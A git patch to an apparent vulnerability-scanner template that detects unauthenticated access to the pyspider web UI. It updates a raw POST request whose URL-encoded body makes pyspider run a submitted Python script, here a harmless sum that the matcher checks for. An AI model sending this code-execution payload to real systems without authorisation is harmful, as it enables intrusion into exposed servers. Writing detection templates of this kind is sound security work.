From 39336f2ca5de3d9c11420b7e9d794f4d87a497f6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Apr 2022 01:34:02 +0530 Subject: [PATCH] Update pyspider-unauthorized-access.yaml --- vulnerabilities/other/pyspider-unauthorized-access.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/pyspider-unauthorized-access.yaml b/vulnerabilities/other/pyspider-unauthorized-access.yaml index 12e68e8040..aaefdccbb2 100644 --- a/vulnerabilities/other/pyspider-unauthorized-access.yaml +++ b/vulnerabilities/other/pyspider-unauthorized-access.yaml @@ -5,7 +5,7 @@ info: author: ritikchaddha severity: high reference: https://github.com/ianxtianxt/Pyspider-webui-poc - tags: pyspider,unauthorized,access + tags: pyspider,unauth requests: - raw: @@ -14,15 +14,16 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(123654789%20%2B%20123654789))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D + webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word + part: body words: - - "247309578" + - "1020236437" - type: status status: